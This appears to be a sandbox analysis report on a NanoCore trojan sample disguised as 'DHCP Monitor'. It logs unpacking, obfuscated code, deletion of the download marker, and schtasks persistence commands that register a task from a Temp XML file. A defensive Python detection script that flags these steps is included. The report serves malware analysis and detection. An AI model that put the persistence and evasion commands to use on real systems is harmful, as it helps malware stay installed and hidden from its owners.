      Source: 2.2.nanocore.exe.4a90000.8.unpack, #=qjIje6jGWLd2EOkfZXKqBbg==.cs | Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
      Source: 2.2.nanocore.exe.4a90000.8.unpack, #=qjIje6jGWLd2EOkfZXKqBbg==.cs | Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
      Source: 11.2.dhcpmon.exe.4920000.9.unpack, #=qjIje6jGWLd2EOkfZXKqBbg==.cs | Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
      Source: 11.2.dhcpmon.exe.4920000.9.unpack, #=qjIje6jGWLd2EOkfZXKqBbg==.cs | Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
      Source: 13.2.dhcpmon.exe.4fa0000.9.unpack, #=qjIje6jGWLd2EOkfZXKqBbg==.cs | Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
      Source: 13.2.dhcpmon.exe.4fa0000.9.unpack, #=qjIje6jGWLd2EOkfZXKqBbg==.cs | Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
      Source: 10.2.nanocore.exe.49c0000.9.unpack, #=qjIje6jGWLd2EOkfZXKqBbg==.cs | Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
      Source: 10.2.nanocore.exe.49c0000.9.unpack, #=qjIje6jGWLd2EOkfZXKqBbg==.cs | Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
      Source: classification engine | Classification label: mal100.troj.evad.winEXE@18/20@24/2
      Source: C:\Users\user\Desktop\nanocore.exe | Code function: 1_2_004041E5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 1_2_004041E5
      Source: C:\Users\user\Desktop\nanocore.exe | Code function: 1_2_004020A6 CoCreateInstance,MultiByteToWideChar, 1_2_004020A6
      Source: C:\Users\user\Desktop\nanocore.exe | Code function: 2_2_00401489 GetModuleHandleW,GetModuleHandleW,FindResourceW,GetModuleHandleW,LoadResource,LockResource,GetModuleHandleW,SizeofResource,FreeResource,ExitProcess, 2_2_00401489
      Source: C:\Users\user\Desktop\nanocore.exe | File created: C:\Program Files (x86)\DHCP Monitor
      Source: C:\Users\user\Desktop\nanocore.exe | File created: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A
      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5820:120:WilError_01
      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4476:120:WilError_01
      Source: C:\Users\user\Desktop\nanocore.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\{bee718f3-e47a-44f8-955e-2fe2c6c0351c}
      Source: C:\Users\user\Desktop\nanocore.exe | File created: C:\Users\user\AppData\Local\Temp\nss2662.tmp
      Source: nanocore.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\nanocore.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\Desktop\nanocore.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\Desktop\nanocore.exe | File read: C:\Users\desktop.ini
      Source: C:\Users\user\Desktop\nanocore.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: nanocore.exe | Virustotal: Detection: 21%
      Source: nanocore.exe | ReversingLabs: Detection: 34%
      Source: C:\Users\user\Desktop\nanocore.exe | File read: C:\Users\user\Desktop\nanocore.exe
      Source: unknown | Process created: C:\Users\user\Desktop\nanocore.exe 'C:\Users\user\Desktop\nanocore.exe'
      Source: C:\Users\user\Desktop\nanocore.exe | Process created: C:\Users\user\Desktop\nanocore.exe 'C:\Users\user\Desktop\nanocore.exe'
      Source: C:\Users\user\Desktop\nanocore.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp38C1.tmp'
      Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\nanocore.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp3B81.tmp'
      Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknown | Process created: C:\Users\user\Desktop\nanocore.exe C:\Users\user\Desktop\nanocore.exe 0
      Source: unknown | Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0
      Source: C:\Users\user\Desktop\nanocore.exe | Process created: C:\Users\user\Desktop\nanocore.exe C:\Users\user\Desktop\nanocore.exe 0
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0
      Source: unknown | Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
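The process-creation rows above carry the two behaviours a detection engineer would key on: schtasks.exe registering a task from an XML file in the user's Temp directory (the "Scheduled temp file as task from temp location" Sigma hit in the signature list), and both nanocore.exe and dhcpmon.exe starting a second copy of their own image before the payload runs. The following is an added example, not Joe Sandbox code and not code from the sample: it runs those two checks over constructed Sysmon-style process-creation events that follow the report's process tree. The rule names, the `TEMP_MARKERS` list and the benign control event are this example's own choices; Joe Sandbox prints arguments in single quotes, while the constructed events use the double quotes Windows actually passes.

```python
"""Process-creation checks for the persistence chain listed above.

Added example, not Joe Sandbox code or code from the sample. Events are
constructed to mirror the report's process tree (Sysmon Event ID 1 style).
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    image: str         # full path of the new process
    parent_image: str  # full path of the process that created it
    command_line: str


# Temp locations the task XML may be written to (assumption: extend per estate).
TEMP_MARKERS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\")


def tokenize(cmdline: str) -> list:
    """Split a Windows command line, keeping double-quoted arguments whole."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def parse_schtasks(cmdline: str) -> dict:
    """Pull /create, /tn and /xml out of a schtasks.exe command line."""
    toks = tokenize(cmdline)
    opts = {"create": False, "tn": None, "xml": None}
    for i, tok in enumerate(toks):
        low = tok.lower()
        if low == "/create":
            opts["create"] = True
        elif low in ("/tn", "/xml") and i + 1 < len(toks):
            opts[low[1:]] = toks[i + 1]
    return opts


def is_temp_path(path: str) -> bool:
    low = path.lower()
    return any(marker in low for marker in TEMP_MARKERS)


def check_schtasks_from_temp(ev: ProcEvent):
    """Task registered from an XML definition that lives in a temp directory."""
    if not ev.image.lower().endswith("\\schtasks.exe"):
        return None
    opts = parse_schtasks(ev.command_line)
    if opts["create"] and opts["xml"] and is_temp_path(opts["xml"]):
        return {"rule": "schtasks_xml_from_temp", "task": opts["tn"],
                "xml": opts["xml"], "parent": ev.parent_image}
    return None


def check_self_spawn(ev: ProcEvent):
    """A process starting a second copy of its own image, as nanocore.exe
    and dhcpmon.exe do in the report before the payload runs in the child."""
    if ev.image.lower() == ev.parent_image.lower():
        return {"rule": "self_spawn", "image": ev.image,
                "command_line": ev.command_line}
    return None


def run_detections(events) -> list:
    alerts = []
    for ev in events:
        for check in (check_schtasks_from_temp, check_self_spawn):
            hit = check(ev)
            if hit:
                alerts.append(hit)
    return alerts


NANOCORE = r"C:\Users\user\Desktop\nanocore.exe"
DHCPMON = r"C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe"
SCHTASKS = r"C:\Windows\SysWOW64\schtasks.exe"
TEMP = r"C:\Users\user\AppData\Local\Temp"

# Constructed events following the report's tree, plus one benign schtasks
# call (XML under ProgramData, not Temp) that must not fire.
SAMPLE_EVENTS = [
    ProcEvent(NANOCORE, r"C:\Windows\explorer.exe", f'"{NANOCORE}"'),
    ProcEvent(NANOCORE, NANOCORE, f'"{NANOCORE}"'),
    ProcEvent(SCHTASKS, NANOCORE,
              f'"schtasks.exe" /create /f /tn "DHCP Monitor" /xml "{TEMP}\\tmp38C1.tmp"'),
    ProcEvent(r"C:\Windows\System32\conhost.exe", SCHTASKS,
              r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    ProcEvent(SCHTASKS, NANOCORE,
              f'"schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "{TEMP}\\tmp3B81.tmp"'),
    ProcEvent(DHCPMON, DHCPMON, f'"{DHCPMON}" 0'),
    ProcEvent(SCHTASKS, r"C:\Windows\System32\svchost.exe",
              r'schtasks.exe /create /tn "Nightly Backup" /xml "C:\ProgramData\Backup\task.xml"'),
]


def demo() -> list:
    return run_detections(SAMPLE_EVENTS)


if __name__ == "__main__":
    for alert in demo():
        print(alert)
```

The temp-XML check is high fidelity on its own; the self-spawn check is not (browsers and updaters also start copies of themselves), so treat it as a correlation signal and tie it to the parent's next actions, here the schtasks calls and the write into Program Files (x86)\DHCP Monitor. Real command lines need Sysmon Event ID 1 or Security 4688 with command-line auditing enabled.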
      Source: C:\Users\user\Desktop\nanocore.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
      Source: C:\Users\user\Desktop\nanocore.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
      Source: Binary string: wntdll.pdbUGP source: nanocore.exe, 00000001.00000003.642186988.000000001EF10000.00000004.00000001.sdmp, nanocore.exe, 00000008.00000003.662832821.000000001EF60000.00000004.00000001.sdmp, dhcpmon.exe, 00000009.00000003.662538555.000000001EE10000.00000004.00000001.sdmp, dhcpmon.exe, 0000000C.00000003.682182243.000000001EE20000.00000004.00000001.sdmp
      Source: Binary string: wntdll.pdb source: nanocore.exe, 00000001.00000003.642186988.000000001EF10000.00000004.00000001.sdmp, nanocore.exe, 00000008.00000003.662832821.000000001EF60000.00000004.00000001.sdmp, dhcpmon.exe, 00000009.00000003.662538555.000000001EE10000.00000004.00000001.sdmp, dhcpmon.exe, 0000000C.00000003.682182243.000000001EE20000.00000004.00000001.sdmp

      Data Obfuscation:

      Detected unpacking (changes PE section rights)
      Source: C:\Users\user\Desktop\nanocore.exe | Unpacked PE file: 2.2.nanocore.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.gfids:R;.rsrc:R;
      Source: C:\Users\user\Desktop\nanocore.exe | Unpacked PE file: 10.2.nanocore.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.gfids:R;.rsrc:R;
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Unpacked PE file: 11.2.dhcpmon.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.gfids:R;.rsrc:R;
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Unpacked PE file: 13.2.dhcpmon.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.gfids:R;.rsrc:R;
      Detected unpacking (creates a PE file in dynamic memory)
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Unpacked PE file: 11.2.dhcpmon.exe.4920000.9.unpack
      Detected unpacking (overwrites its own PE header)
      Source: C:\Users\user\Desktop\nanocore.exe | Unpacked PE file: 2.2.nanocore.exe.400000.0.unpack
      Source: C:\Users\user\Desktop\nanocore.exe | Unpacked PE file: 10.2.nanocore.exe.400000.0.unpack
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Unpacked PE file: 11.2.dhcpmon.exe.400000.0.unpack
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Unpacked PE file: 13.2.dhcpmon.exe.400000.1.unpack
      .NET source code contains potential unpacker
      Source: 2.2.nanocore.exe.4a90000.8.unpack, #=qjIje6jGWLd2EOkfZXKqBbg==.cs | .Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 2.2.nanocore.exe.4a90000.8.unpack, #=qxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecU=.cs | .Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 10.2.nanocore.exe.49c0000.9.unpack, #=qxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecU=.cs | .Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 10.2.nanocore.exe.49c0000.9.unpack, #=qjIje6jGWLd2EOkfZXKqBbg==.cs | .Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 11.2.dhcpmon.exe.4920000.9.unpack, #=qjIje6jGWLd2EOkfZXKqBbg==.cs | .Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 11.2.dhcpmon.exe.4920000.9.unpack, #=qxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecU=.cs | .Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 13.2.dhcpmon.exe.4fa0000.9.unpack, #=qjIje6jGWLd2EOkfZXKqBbg==.cs | .Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 13.2.dhcpmon.exe.4fa0000.9.unpack, #=qxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecU=.cs | .Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: C:\Users\user\Desktop\nanocore.exe | Code function: 1_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode, 1_2_00401FDC
      Source: C:\Users\user\Desktop\nanocore.exe | Code function: 2_2_00401F16 push ecx; ret 2_2_00401F29
      Source: C:\Users\user\Desktop\nanocore.exe | Code function: 2_2_051C7648 push eax; iretd 2_2_051C7649
      Source: C:\Users\user\Desktop\nanocore.exe | Code function: 10_2_00401F16 push ecx; ret 10_2_00401F29
      Source: C:\Users\user\Desktop\nanocore.exe | Code function: 10_2_050D7648 push eax; iretd 10_2_050D7649
      Source: C:\Users\user\Desktop\nanocore.exe | Code function: 10_2_05266E5D push FFFFFF8Bh; iretd 10_2_05266E5F
      Source: C:\Users\user\Desktop\nanocore.exe | Code function: 10_1_00401F16 push ecx; ret 10_1_00401F29
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Code function: 11_2_00401F16 push ecx; ret 11_2_00401F29
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Code function: 11_2_05087648 push eax; iretd 11_2_05087649
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Code function: 11_2_05256E5D push FFFFFF8Bh; iretd 11_2_05256E5F
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Code function: 11_1_00401F16 push ecx; ret 11_1_00401F29
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Code function: 13_2_00401F16 push ecx; ret 13_2_00401F29
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Code function: 13_2_051C7648 push eax; iretd 13_2_051C7649
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Code function: 13_2_05396E5D push FFFFFF8Bh; iretd 13_2_05396E5F
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Code function: 13_1_00401F16 push ecx; ret 13_1_00401F29
      Source: 2.2.nanocore.exe.4a90000.8.unpack, #=qJT4I5hOweIk$xYFEeDszbikglXCuquUd$v9AXtyq2ns=.cs  High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
      Source: 2.2.nanocore.exe.4a90000.8.unpack, #=qWrm21vQ8CBMZP_RBTwpusA==.cs  High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
      Source: 10.2.nanocore.exe.49c0000.9.unpack, #=qWrm21vQ8CBMZP_RBTwpusA==.cs  High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
      Source: 10.2.nanocore.exe.49c0000.9.unpack, #=qJT4I5hOweIk$xYFEeDszbikglXCuquUd$v9AXtyq2ns=.cs  High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
      Source: 11.2.dhcpmon.exe.4920000.9.unpack, #=qWrm21vQ8CBMZP_RBTwpusA==.cs  High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
      Source: 11.2.dhcpmon.exe.4920000.9.unpack, #=qJT4I5hOweIk$xYFEeDszbikglXCuquUd$v9AXtyq2ns=.cs  High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
      Source: 13.2.dhcpmon.exe.4fa0000.9.unpack, #=qJT4I5hOweIk$xYFEeDszbikglXCuquUd$v9AXtyq2ns=.cs  High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
      Source: 13.2.dhcpmon.exe.4fa0000.9.unpack, #=qWrm21vQ8CBMZP_RBTwpusA==.cs  High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe  File created: C:\Users\user\AppData\Local\Temp\nse444B.tmp\4rmzuajr4dtt.dll
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe  File created: C:\Users\user\AppData\Local\Temp\nsq6D11.tmp\4rmzuajr4dtt.dll
      Source: C:\Users\user\Desktop\nanocore.exe  File created: C:\Users\user\AppData\Local\Temp\nsn2692.tmp\4rmzuajr4dtt.dll
      Source: C:\Users\user\Desktop\nanocore.exe  File created: C:\Users\user\AppData\Local\Temp\nsj42E4.tmp\4rmzuajr4dtt.dll
      Source: C:\Users\user\Desktop\nanocore.exe  File created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe

      Boot Survival:

      Uses schtasks.exe or at.exe to add and modify task schedules
      Source: C:\Users\user\Desktop\nanocore.exe  Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp38C1.tmp'

      Hooking and other Techniques for Hiding and Protection:

      Hides that the sample has been downloaded from the Internet (zone.identifier)
      Source: C:\Users\user\Desktop\nanocore.exe  File opened: C:\Users\user\Desktop\nanocore.exe:Zone.Identifier read attributes | delete
      Source: C:\Users\user\Desktop\nanocore.exe  Process information set: NOOPENFILEERRORBOX (55 identical entries)
      Source: C:\Windows\SysWOW64\schtasks.exe  Process information set: NOOPENFILEERRORBOX (4 identical entries)
      Source: C:\Windows\System32\conhost.exe  Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\schtasks.exe  Process information set: NOOPENFILEERRORBOX (4 identical entries)
      Source: C:\Windows\System32\conhost.exe  Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\nanocore.exe  Process information set: NOOPENFILEERRORBOX (2 identical entries)
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe  Process information set: NOOPENFILEERRORBOX (2 identical entries)
      Source: C:\Users\user\Desktop\nanocore.exe  Process information set: NOOPENFILEERRORBOX (37 identical entries)
